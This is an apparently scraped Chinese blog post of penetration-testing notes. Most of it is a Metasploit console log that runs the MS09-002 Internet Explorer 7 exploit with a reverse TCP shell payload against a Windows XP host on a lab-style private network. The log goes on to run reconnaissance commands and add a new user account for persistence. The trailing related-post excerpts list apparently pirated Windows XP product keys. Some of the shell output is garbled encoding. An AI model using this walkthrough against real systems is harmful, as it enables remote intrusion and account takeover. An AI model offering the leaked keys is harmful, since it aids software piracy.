渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

Welcome to the Metasploit Web Console!
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 308 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 308 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/browser/ms09_002_memory_corruption
>> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> set SRVHOST 172.16.2.100
SRVHOST => 172.16.2.100
>> set LHOST 172.16.2.100
LHOST => 172.16.2.100
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 172.16.2.100 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 172.16.2.100 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.2.100:4444
[*] Using URL: http://172.16.2.100:8080/9wZVWxuy
[*] Server started.
>> back
>> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 172.16.2.100:4444 -> 172.16.2.120:1125
>> sessions -i 1
sessions -i 1
‘sessions‘ 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò
?ò?ú′|àí???t?£
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : www-95a235b5556
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user
net user
\\WWW-95A235B5556 μ?ó??§?ê?§
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0
?üá?3é1|íê3é?£
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user shentouceshiwy /add
net user shentouceshiwy /add
?üá?3é1|íê3é?£
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user
net user
\\WWW-95A235B5556 μ?ó??§?ê?§
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
shentouceshiwy SUPPORT_388945a0
?üá?3é1|íê3é?£
时间: 2024-10-11 21:26:23

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的相关文章

使用Mirage将Windows XP升级到Windows 7

如今微软已经不支持Windows XP了,所以需要将XP升级到Windows 7了.一般情况下,从Windows XP升级到Windows 会面临如下问题: 1. 数据丢失:无论是终端用户自己进行升级还是IT的管理员来做这件事情,丢失数据的风险总是存在的. 2. 终端长时间不可用:在使用诸如微软的SCCM之类的工具进行升级时,终端会有很长处于不可用状态,这对很多用户来说是不可忍受的. 3. 应用程序的部署:在Windows XP上跑的应用程序不能直接被迁移到Windows 7. 4. 迁移到虚拟

渗透杂记-2013-07-13 windows/mssql/mssql_payload

扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:36 Scanning 203.171.239.* [4 ports] Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts) Initiating Par

渗透杂记-2013-07-12

[email protected]:~# msfpro [*] Starting Metasploit Console... [-] WARNING! The following modules could not be loaded! [-] /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common Call t

Windows XP SP3中远程桌面实现多用户登陆

1 [原创]Windows XP SP3中远程桌面实现多用户登陆 现在电脑我想都可以在远程控制和远程协助了吧(xp,sp2,sp3),现在一个问题,你想远程操控你的电脑,但是你电脑有人用,你好意思让他退出~然后你在远程控制?呵呵,下面Star我为他家说说sp3多用户控制的弄法~~sp2这些都类似~具体没有试.. 案例:电脑建2个用户,一个用户你专用(假设为:xp1),一个用户给别人用(假设为:xp2)~自己看着办~如果你远程控制你的电脑通过电脑进入你的用户名xp1,这个时候你会发现,弹出一个提示

渗透杂记-2013-07-13 关于SMB版本的扫描

smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |

最新的windows xp sp3序列号(绝对可通过正版验证)

MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6JRYC-X66GX-JVY2D 可用 DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ 可用 F4297-RCWJP-P482C-YY23Y-XH8W3 可装不可升级 HH7VV-6P3G9-82TWK-QKJJ3-MXR96 HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT W

初试 Windows XP Embedded 系统开发1

眼下 Windows PE(Preinstallation Environment)和 Windows XP Embedded 是能够脱离主机里的硬盘独立执行的 Windows 操作系统,Windows PE 多用于光盘启动,Windows Embedded 从 Feature Pack 2007 之后已经支持从 USB 设备(移动硬盘.Flash U 盘)执行. 从基础開始,菜鸟也能够开发出一个在 USB 移动硬盘上执行的操作系统. 一.Windows Embedded 开发资源简单介绍 Wi

Windows XP与Windows 7系统常见漏洞

1.Windows XP系统常见漏洞 Windows XP系统常见的漏洞有UPNP服务漏洞.升级程序漏洞.帮助和支持中心漏洞.压缩文件夹漏洞.服务拒绝漏洞.Windows Media Player漏洞.RDP漏洞.VM漏洞.热键漏洞.账号快速切换漏洞等. (1)UPNP服务漏洞 漏洞描述:允许攻击者执行任意指令. Windows XP默认启动的UPNP服务存在严重安全漏洞.UPNP(Universal Plug and Play)体系面向无线设备.PC和智能应用,提供普遍的对等网络连接,在家用信

Windows XP Mode安装

安装手顺:1. 检测系统是否支持Windows XP Mode2. 安装Windows Virtual PC3. 安装Windows XP Mode 下载地址:1. Windows XP Modehttps://www.microsoft.com/en-us/download/details.aspx?id=5922. Windows Virtual PChttps://www.microsoft.com/en-us/download/details.aspx?id=37023. Windows

Windows XP时代终结:假设你还在用它怎么办

2014 年 4 月 8 日.是Windows XP退休的日子. 4 月 8 日过后,Windows XP 的安全性更新将停止了. watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvaXF1c2hp/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" > 我们一直在谈论离开 Windows XP 的重要性,还有让你所认识的人了解离开WindowsXP的